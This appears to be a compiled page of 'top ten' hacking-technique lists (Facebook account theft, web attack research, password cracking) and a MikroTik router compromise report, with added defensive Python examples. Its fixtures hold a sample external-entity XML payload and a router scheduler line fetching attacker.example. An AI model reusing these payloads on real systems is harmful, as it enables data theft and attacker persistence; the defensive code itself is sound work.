HackTech News -
Top ten hacking techniques -
1. Phishing
Phishing is still the most popular attack vector used for hacking Facebook accounts. There are a variety of methods for carrying out a phishing attack. In a simple phishing attack, the hacker creates a fake login page that looks exactly like the real Facebook page and then asks the victim to log in. Once the victim logs in through the fake page, the victim's email address and password are stored in a text file; the hacker then downloads that file and obtains the victim's credentials.
2. Keylogging
Keylogging is the easiest way to hack a Facebook password. Keylogging can be so dangerous that even a person with good computer knowledge can fall for it. A keylogger is basically a small program which, once installed on the victim's computer, records everything the victim types. The logs are then sent back to the attacker, either by FTP or directly to the hacker's email address.
3. Stealers
Almost 80% of people use passwords stored in their browser to access Facebook. This is quite convenient, but it can sometimes be extremely dangerous. Stealers are programs specially designed to capture the saved passwords stored in the victim's web browser.
4. Session Hijacking
Session hijacking can be very dangerous if you access Facebook over an http (non-secure) connection. In a session hijacking attack, the hacker steals the victim's browser cookie, which is used to authenticate the user to the website, and uses it to access the victim's account. Session hijacking is widely used on LAN and WiFi connections.
5. Sidejacking With Firesheep
Sidejacking attacks became common in late 2010, but they are still popular today. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and the victim are on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it is more targeted at WiFi users.
6. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. If the hacker can gain access to the victim's mobile phone, he can probably gain access to his/her Facebook account. There are a lot of mobile spying programs used to monitor a cellphone. The most popular mobile phone spying programs are Mobile Spy and Spy Phone Gold.
7. DNS Spoofing
If both the victim and the attacker are on the same network, the attacker can use a DNS spoofing attack to replace the original Facebook page with his own fake page and thereby gain access to the victim's Facebook account.
8. USB Hacking
If an attacker has physical access to your computer, he could simply insert a USB drive programmed to automatically extract the passwords saved in the web browser.
9. Man In the Middle Attacks
If the victim and the attacker are on the same LAN on a switched network, the hacker can place himself between the client and the server, or act as the default gateway, and thereby capture all the traffic passing between them.
10. Botnets
Botnets are not commonly used for hacking Facebook accounts because of their high setup cost. They are used to carry out more advanced attacks. A botnet is basically a collection of compromised computers. The infection process is the same as for keylogging, but a botnet gives the attacker additional options for carrying out attacks with the compromised computers. Some of the most popular botnets include SpyEye and Zeus.
Top 10 Web hacking techniques -
1. FREAK (Factoring Attack on RSA-Export Keys)
The FREAK ("Factoring RSA Export Keys") attack is a security threat arising from an SSL/TLS vulnerability that was discovered on March 3, 2015. In such an attack, the attacker intercepts the HTTPS connection between a vulnerable client and server and forces them to use weakened export-grade encryption. Such encryption can easily be broken to manipulate the web server and access sensitive data.
The FREAK attack was discovered by Karthikeyan Bhargavan at INRIA in Paris and the miTLS team and announced by Matthew Green.
2. LogJam
LogJam is a kind of man-in-the-middle (MITM) attack in which an attacker surreptitiously relays and alters the traffic between two parties who believe they are communicating directly with each other.
In a LogJam attack, the attacker secretly downgrades vulnerable TLS connections to 512-bit export-grade cryptography. This allows him to easily read and modify any data passed over the connection. The attack is reminiscent of the FREAK attack, but it is due to a flaw in the TLS protocol rather than an implementation vulnerability, and it attacks a Diffie-Hellman key exchange rather than an RSA key exchange. Any server that supports DHE_EXPORT ciphers, and all the latest web browsers, are susceptible to such attacks.
3. Web Timing Attacks Made Practical
Web timing attacks have been known for many years, but this is the first time that researchers showed how one can be executed in practice. A web timing attack is a side-channel attack in which the hacker attempts to compromise a cryptosystem by analysing the time taken to execute cryptographic algorithms. Every logical operation takes some time to execute, and that time can differ based on the input. With precise measurements of the time taken for each operation, an attacker can work backwards to the input.
A Black Hat talk showed how to tweak timing side-channel attacks to make remote timing attacks against modern web apps easier to perform.
The lead researchers of web timing attack are Timothy Morgan and Jason Morgan.
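The leak described above comes from comparisons that stop at the first mismatching character, so the work done (and thus the time taken) grows with the length of the correct prefix. The following added example (not code from the talk or the page) makes that visible by counting the characters a naive comparison examines, and shows the standard mitigation, a constant-time comparison. The token value is constructed.

```python
from __future__ import annotations

import hmac


def naive_equal(expected: str, supplied: str) -> tuple[bool, int]:
    """Early-exit comparison. Returns (equal, characters examined).

    The number of characters examined is what a remote timing attack
    measures indirectly: more matching prefix means more work, more time."""
    steps = 0
    if len(expected) != len(supplied):
        return False, steps
    for a, b in zip(expected, supplied):
        steps += 1
        if a != b:
            return False, steps
    return True, steps


def constant_time_equal(expected: str, supplied: str) -> bool:
    """Mitigation: compare every byte regardless of where the first mismatch is,
    so timing no longer depends on how much of the guess is correct."""
    return hmac.compare_digest(expected.encode(), supplied.encode())


def prefix_leak(secret: str, guesses: list[str]) -> dict[str, int]:
    """Characters the naive compare examines for each guess; the count climbs
    with the length of the correct prefix, which is the side channel."""
    return {g: naive_equal(secret, g)[1] for g in guesses}


if __name__ == "__main__":
    token = "7f3a9c"  # constructed secret, same length as the guesses below
    print(prefix_leak(token, ["000000", "700000", "7f0000", "7f3a9c"]))
    print(constant_time_equal(token, "7f3a9c"))
```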
4. Evading All* WAF XSS Filters
All web application firewalls are supposed to protect against attacks, but they don't protect as well as expected.
Cross-site scripting (XSS) is a web application vulnerability which enables an attacker to inject his own client-side scripts into web pages. In most cases, an input form is used by the attacker to inject his malicious code.
Security researcher Mazin Ahmed found that it is possible to evade the cross-site scripting filters of all popular web application firewalls. By successfully exploiting an XSS vulnerability, an attacker can easily steal cookies and credentials and even spread malware.
5. Abusing CDN’s with SSRF Flash and DNS
Nowadays almost all websites use content delivery networks (CDNs) to speed up their websites and to serve content to end users with higher availability based on their geographical location. This allows an attacker who penetrates the CDN's protection to steal visitors' cookies with a modified JS file that runs on the vulnerable website. Research presented at Black Hat describes a collection of attack patterns that can be used against content delivery networks to target a wide range of high-availability websites.
6. Illusory TLS
Illusory TLS is an elliptic-curve asymmetric backdoor in RSA key generation which can wreck the universal implicit cross-certification adopted in the current Web PKI and break all of the security guarantees of HTTPS. This attack pattern undermines the security assurances of the X.509 PKI architecture by employing CA certificates that include a secretly embedded backdoor. It was discovered by security researcher Alfonso De Gregorio.
7. Exploiting XXE in File Parsing Functionality
Cyber criminals can exploit XXE in file parsing functionality.
An XML External Entity (XXE) attack is a type of attack against an application that parses XML input. The attack succeeds when XML input containing a reference to an external entity is processed by a weakly configured XML parser. It may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
A Black Hat talk examined different methods of exploiting XML entity vulnerabilities in the file parsing/upload functionality for XML-based file formats such as DOCX, XLSX, and PDF.
This attack was discovered by security researcher Will Vandevanter.
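Office formats such as DOCX and XLSX are zip containers full of XML parts, and none of those parts has any legitimate need for a DTD. The added example below (my own code, not from the talk or the page) scans every XML part of an uploaded container for DOCTYPE or ENTITY declarations before any parser sees it, which is the usual hardening for this upload path; the container and its parts are constructed in memory for the demonstration.

```python
import io
import re
import zipfile

# A DTD is the only place entities can be declared, so refusing any part that
# carries one removes external entity processing from the upload path.
DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def xml_parts_with_dtd(document: bytes) -> list:
    """Names of the XML parts inside an Office-style zip that declare a DTD.
    An empty list means the container is safe to hand to the XML parser."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(document)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue  # images, fonts and other binary parts are not parsed as XML
            if DTD_MARKER.search(zf.read(name)):
                flagged.append(name)
    return flagged


def build_docx_like(parts: dict) -> bytes:
    """Constructs a minimal zip container from {part name: xml text} (fixture only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, text in parts.items():
            zf.writestr(name, text)
    return buf.getvalue()


# Constructed sample parts: a benign document, and the same document where one
# part declares an external entity, the shape the file-parsing XXE talk describes.
BENIGN = {
    "[Content_Types].xml": '<?xml version="1.0"?><Types/>',
    "word/document.xml": '<?xml version="1.0"?><w:document xmlns:w="urn:x"/>',
}
HOSTILE = dict(BENIGN)
HOSTILE["word/document.xml"] = (
    '<?xml version="1.0"?><!DOCTYPE w [<!ENTITY ext SYSTEM "file:///placeholder">]>'
    '<w:document xmlns:w="urn:x">&ext;</w:document>'
)

if __name__ == "__main__":
    print("benign:", xml_parts_with_dtd(build_docx_like(BENIGN)))
    print("hostile:", xml_parts_with_dtd(build_docx_like(HOSTILE)))
```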
8. Abusing XSLT for Practical Attacks
Security researcher Fernando Arnaboldi presented the different vectors for XSLT attacks at the Black Hat conference for the first time. Vulnerabilities in XSLT have been known for a long time. XSLT converts XML documents into other XML documents, or into other formats such as HTML for web pages, plain text or XSL. This can lead to security issues such as denial of service attacks and cross-site attacks, and can threaten the integrity and confidentiality of user information.
9. Magic Hashes
Security researchers Robert Hansen and Jeremi M. Gosney discovered a vulnerability arising from a subtlety in the way PHP handles hashed strings in certain instances. It makes it feasible to compromise authentication systems and other functions, giving the attacker unauthorized access with which to steal sensitive or personal information.
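The subtlety is PHP's loose comparison: when both operands look numeric, `==` compares them as numbers, so a hex digest of the form `0e` followed only by digits is treated as zero and "equals" any other such digest. The added example below (my own code, not the researchers') emulates that rule in Python, applies it to two inputs whose MD5 digests are known to have that form, and shows the fix, a strict comparison. The numeric-string regex is a simplification of PHP's rule, not a full reimplementation.

```python
import hashlib
import re

# Simplified emulation of PHP's numeric-string rule (assumption: enough of it
# for hex digests). A string matching this is compared as a number by ==,
# so "0e123..." == "0e456..." holds because both parse to 0 * 10^n = 0.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_eq(a: str, b: str) -> bool:
    """What PHP's == does with two strings (emulated here, not PHP itself)."""
    if _PHP_NUMERIC.match(a) and _PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def safe_eq(a: str, b: str) -> bool:
    """The fix: strict string comparison (PHP === or hash_equals)."""
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(h: str) -> bool:
    """True for a hex digest PHP would read as the number zero: 0e then digits only."""
    return re.fullmatch(r"0e\d+", h) is not None


if __name__ == "__main__":
    # Two widely cited inputs whose MD5 digests both have the form 0e<digits>.
    for p in ("240610708", "QNKCDZO"):
        print(p, md5_hex(p), is_magic_hash(md5_hex(p)))
    print(php_loose_eq(md5_hex("240610708"), md5_hex("QNKCDZO")))  # True
    print(safe_eq(md5_hex("240610708"), md5_hex("QNKCDZO")))       # False
```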
10. Hunting Asynchronous Vulnerabilities
There are a number of asynchronous vulnerabilities that are not visible to the client, such as those in error messages, async calls etc. Security researcher James Kettle presented research at 44CON that demonstrated how to use exploit-induced callback methods to find such vulnerabilities hiding in backend functions and background threads.
Top ten password-cracking techniques -
1. Dictionary attack
The dictionary attack uses a simple file containing words that can be found in a dictionary, hence its rather straightforward name. In other words, this attack uses exactly the kind of words that many people use as their password.
Cleverly grouping words together such as "letmein" or "superadministratorguy" will not prevent your password from being cracked this way – well, not for more than a few extra seconds.
2. Brute force attack
Similar to the dictionary attack, the brute force attack comes with an added bonus for the hacker. Instead of simply using words, a brute force attack lets them detect non-dictionary words by working through all possible alpha-numeric combinations from aaa1 to zzz10.
It's not quick, provided your password is more than a handful of characters long, but it will uncover your password eventually. Brute force attacks can be shortened by throwing additional computing horsepower at them, in terms of both processing power – including harnessing the power of your video card's GPU – and the number of machines, such as by using distributed computing models like online bitcoin miners.
3. Rainbow table attack
Rainbow tables aren't as colourful as their name may imply, but, for a hacker, your password could well be at the end of one. Put as simply as possible, a rainbow table boils down to a list of pre-computed hashes – the value produced when a password is hashed. This table contains hashes of all possible password combinations for a given hashing algorithm. Rainbow tables are attractive because they reduce the time needed to crack a password hash to simply looking something up in a list.
However, rainbow tables are huge, unwieldy things. They require serious computing power to run, and a table becomes useless if the hash it is trying to find has been "salted" by the addition of random characters to the password before the hashing algorithm is applied.
There is talk of salted rainbow tables existing, but these would be so large as to be difficult to use in practice. They would likely only work with a predefined "random character" set and password strings below 12 characters, as the size of the table would otherwise be prohibitive even to state-level hackers.
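To make the salting point concrete, here is an added example (my own code, not from the article) in which a tiny dictionary of precomputed unsalted hashes stands in for a rainbow table. An unsalted record is recovered by a plain lookup; a record stored with a per-user random salt and an iterated KDF (PBKDF2 here) is absent from the table, and two users with the same password end up with different stored keys. The word list is constructed.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000

# Constructed mini word list standing in for the precomputed table's inputs.
WORDLIST = ["letmein", "password", "superadministratorguy", "qwerty"]


def unsalted_digest(password: str) -> str:
    """What a site stores when it hashes passwords without a salt."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(words) -> dict:
    """A tiny stand-in for a rainbow table: unsalted digest -> password."""
    return {unsalted_digest(w): w for w in words}


def lookup(digest: str, table: dict):
    """Cracking an unsalted hash is just a dictionary lookup."""
    return table.get(digest)


def hash_password(password: str, salt: bytes = b"") -> tuple:
    """Per-user random salt plus an iterated KDF; returns (salt, key).
    Both must be stored, the salt need not be secret."""
    salt = salt or os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, key


def verify_password(password: str, salt: bytes, key: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, key)


def salt_defeats_table(password: str, table: dict) -> bool:
    """True when the salted record is not in the precomputed table, two users
    with the same password get different keys, and verification still works."""
    s1, k1 = hash_password(password)
    s2, k2 = hash_password(password)
    return (lookup(k1.hex(), table) is None
            and k1 != k2
            and verify_password(password, s1, k1))


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("unsalted letmein ->", lookup(unsalted_digest("letmein"), table))
    print("salted letmein defeats table:", salt_defeats_table("letmein", table))
```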
4. Phishing
There's an easy way to hack: ask the user for his or her password. A phishing email leads the unsuspecting reader to a faked login page for whatever service the hacker wants to access, requesting the user to put right some terrible problem with their security. That page then skims their password and the hacker can go and use it for their own purposes.
Why bother going to the trouble of cracking the password when the user will happily give it to you anyway?
5. Social engineering
Social engineering takes the whole "ask the user" concept outside of the inbox that phishing tends to stick with and into the real world.
A favourite of the social engineer is to call an office posing as an IT security tech guy and simply ask for the network access password. You’d be amazed at how often this works. Some even have the necessary gonads to don a suit and name badge before walking into a business to ask the receptionist the same question face to face.
6. Malware
A keylogger, or screen scraper, can be installed by malware; it records everything you type or takes screenshots during a login process, and then forwards a copy of this file to hacker central.
Some malware will look for the existence of a web browser client password file and copy this which, unless properly encrypted, will contain easily accessible saved passwords from the user's browsing history.
7. Offline cracking
It’s easy to imagine that passwords are safe when the systems they protect lock out users after three or four wrong guesses, blocking automated guessing applications. Well, that would be true if it were not for the fact that most password hacking takes place offline, using a set of hashes in a password file that has been ‘obtained’ from a compromised system.
Often the target in question has been compromised via a hack on a third party, which then provides access to the system servers and those all-important user password hash files. The password cracker can then take as long as they need to try and crack the code without alerting the target system or individual user.
8. Shoulder surfing
The most confident of hackers will take the guise of a parcel courier, aircon service technician or anything else that gets them access to an office building.
Once they are in, the service personnel "uniform" provides a kind of free pass to wander around unhindered, and make note of passwords being entered by genuine members of staff. It also provides an excellent opportunity to eyeball all those post-it notes stuck to the front of LCD screens with logins scribbled upon them.
9. Spidering
Savvy hackers have realised that many corporate passwords are made up of words that are connected to the business itself. Studying corporate literature, website sales material and even the websites of competitors and listed customers can provide the ammunition to build a custom word list to use in a brute force attack.
Really savvy hackers have automated the process and let a spidering application, similar to those employed by leading search engines to identify keywords, collect and collate the lists for them.
10. Guess
The password cracker's best friend, of course, is the predictability of the user. Unless a truly random password has been created using software dedicated to the task, a user-generated 'random' password is unlikely to be anything of the sort.
Instead, thanks to our brains' emotional attachment to things we like, the chances are those random passwords are based upon our interests, hobbies, pets, family and so on. In fact, passwords tend to be based on all the things we like to chat about on social networks and even include in our profiles. Password crackers are very likely to look at this information and make a few - often correct - educated guesses when attempting to crack a consumer-level password without resorting to dictionary or brute force attacks.
1. Bait and Switch
Using the bait and switch hacking technique, an attacker buys advertising space on websites. Later, when a user clicks on the ad, he might be directed to a page that's infected with malware. This way, the attacker can install further malware or adware on your computer. The ads and download links shown in this technique are very attractive, and users are expected to end up clicking on them.
The hacker can run a malicious program which the user believes to be authentic. This way, after the malicious program is installed on your computer, the hacker gets unprivileged access to your computer.
2. Cookie Theft
A browser's cookies keep our personal data such as browsing history, username, and passwords for the different sites that we access. Once the hacker gets access to your cookie, he can even authenticate himself as you in a browser. A popular method to carry out this attack is to encourage a user's IP packets to pass through the attacker's machine.
Also known as sidejacking or session hijacking, this attack is easy to carry out if the user is not using SSL (https) for the complete session. For websites where you enter your password and banking details, it is of utmost importance that their connections are encrypted.
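The session hijacking, sidejacking and cookie theft passages all come down to one question: can the session cookie be sent over plain http or read by injected script? The added example below (my own code, not from the page) audits a Set-Cookie header for the attributes that answer that question; the two header values are constructed, not captured from any site.

```python
def parse_set_cookie(header_value: str) -> tuple:
    """Splits 'name=value; Attr; Attr=val' into the cookie name and its attributes
    (attribute names lower-cased, valueless flags stored as True)."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip() if value else True
    return name, attrs


def audit_set_cookie(header_value: str) -> list:
    """Findings for one Set-Cookie header value: the missing attributes that
    let a session cookie be sniffed on http or stolen by script."""
    name, attrs = parse_set_cookie(header_value)
    findings = []
    if "secure" not in attrs:
        findings.append(f"{name}: no Secure flag, so it is sent over plain http")
    if "httponly" not in attrs:
        findings.append(f"{name}: no HttpOnly flag, so script can read it")
    samesite = attrs.get("samesite")
    if not isinstance(samesite, str) or samesite.lower() not in ("lax", "strict"):
        findings.append(f"{name}: SameSite is not Lax or Strict")
    if name.startswith("__Host-") and attrs.get("path") != "/":
        findings.append(f"{name}: __Host- prefix requires Path=/")
    return findings


# Constructed sample headers.
WEAK = "sessionid=abc123; Path=/"
HARDENED = "__Host-sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"

if __name__ == "__main__":
    for header in (WEAK, HARDENED):
        print(header, "->", audit_set_cookie(header) or "ok")
```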
3. ClickJacking Attacks
ClickJacking is also known by a different name, UI redress. In this attack, the hacker hides the actual UI where the victim is supposed to click. This behaviour is very common on app download, movie streaming, and torrent websites. While they mostly employ this technique to earn advertising dollars, others can use it to steal your personal information.
In other words, in this type of hacking, the attacker hijacks the victim's clicks, which land not on the page the victim sees but on a page where the hacker wants them to be. It works by fooling an internet user into performing an undesired action by clicking on a hidden link.
4. Virus, Trojan etc.
Viruses and trojans are malicious software programs which get installed on the victim's system and keep sending the victim's data to the hacker. They can also lock your files, serve fraudulent advertisements, divert traffic, sniff your data, or spread to all the computers connected to your network.
5. Phishing
Phishing is a hacking technique in which a hacker replicates the most-accessed sites and traps the victim by sending that spoofed link. Combined with social engineering, it becomes one of the most commonly used and deadliest attack vectors.
Once the victim tries to log in or enters some data, the hacker obtains the target's private information using the trojan running on the fake site. Phishing of iCloud and Gmail accounts was the attack route taken by the hackers behind the "Fappening" leak, which involved numerous female Hollywood celebrities.
CoinHive Mining Code Injection -
Once the MikroTik RouterOS HTTP proxy is enabled, the attackers hijack HTTP proxy requests to a local HTTP 403 error page which injects a link to web mining code from Coinhive. The mining code used in this way cannot work, however, because all external web resources, including the coinhive.com ones, are blocked by the proxy ACLs set by the attackers themselves.
Maliciously Enabling Socks4 Proxy -
The attackers enabled the Socks4 port, TCP/4153, on the victims' devices; in this way the attacker gains persistence on the router even after it has been rebooted (IP change), by having it periodically report its latest IP address to the attacker's URL. "A total of 239K IPs are confirmed to have Socks4 proxy enabled maliciously. The Socks4 port is mostly TCP/4153, and very interestingly, the Socks4 proxy config only allows access from one single net-block 22.214.171.124/25," states the report. "In order for the attacker to gain control even after device reboot (IP change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker's URL." Experts pointed out that all 239,000 IP addresses only allow access from 126.96.36.199/25, actually mainly from the 188.8.131.52 address.
MikroTik RouterOS devices can capture packets on the router and forward them to a specified stream server; this feature could be abused by attackers to forward the traffic to IP addresses they control. Experts noticed that a significant number of devices have their traffic going to the 184.108.40.206 IP.
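For a defender, the three behaviours described above (HTTP proxy enabled, Socks4 enabled on TCP/4153, a scheduler task that fetches an attacker URL, and sniffer traffic streamed to an outside host) are all visible in a router's exported configuration. The added example below (my own code, not from the report) parses an export in the `/export` style that RouterOS produces and flags those entries; the sample export, the `attacker.example` host and the 192.0.2.10 address are constructed placeholders, and the section and key names are assumed from RouterOS' own command syntax.

```python
import shlex

# Constructed sample in RouterOS /export style (not a real device dump).
SAMPLE_EXPORT = """\
# constructed sample
/ip proxy
set enabled=yes port=8080
/ip socks
set enabled=yes port=4153
/system scheduler
add interval=10m name=upd on-event="/tool fetch url=http://attacker.example/report"
/tool sniffer
set streaming-enabled=yes streaming-server=192.0.2.10
/ip service
set www port=80
"""


def parse_export(text: str) -> list:
    """Turns export output into (section, {key: value}) entries. Handles both
    the two-line form ('/ip socks' then 'set ...') and the one-line form
    ('/ip socks set ...'); quoted values such as on-event="..." stay intact."""
    entries, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)
        if line.startswith("/"):
            head = []
            while tokens and tokens[0] not in ("add", "set"):
                head.append(tokens.pop(0))
            section = " ".join(head)
            if not tokens:
                continue  # bare section header, parameters follow on later lines
        params = dict(t.split("=", 1) for t in tokens[1:] if "=" in t)
        entries.append((section, params))
    return entries


def audit_export(text: str) -> list:
    """Findings matching the abuse pattern the report describes."""
    findings = []
    for section, p in parse_export(text):
        if section == "/ip socks" and p.get("enabled") == "yes":
            findings.append(f"socks proxy enabled on port {p.get('port', '1080')}")
        elif section == "/ip proxy" and p.get("enabled") == "yes":
            findings.append("http proxy enabled")
        elif section == "/tool sniffer" and p.get("streaming-enabled") == "yes":
            findings.append(f"packet sniffer streaming to {p.get('streaming-server', '?')}")
        elif section == "/system scheduler" and "fetch" in p.get("on-event", ""):
            findings.append(f"scheduler '{p.get('name', '?')}' runs fetch: {p['on-event']}")
    return findings


if __name__ == "__main__":
    for finding in audit_export(SAMPLE_EXPORT):
        print("FINDING:", finding)
```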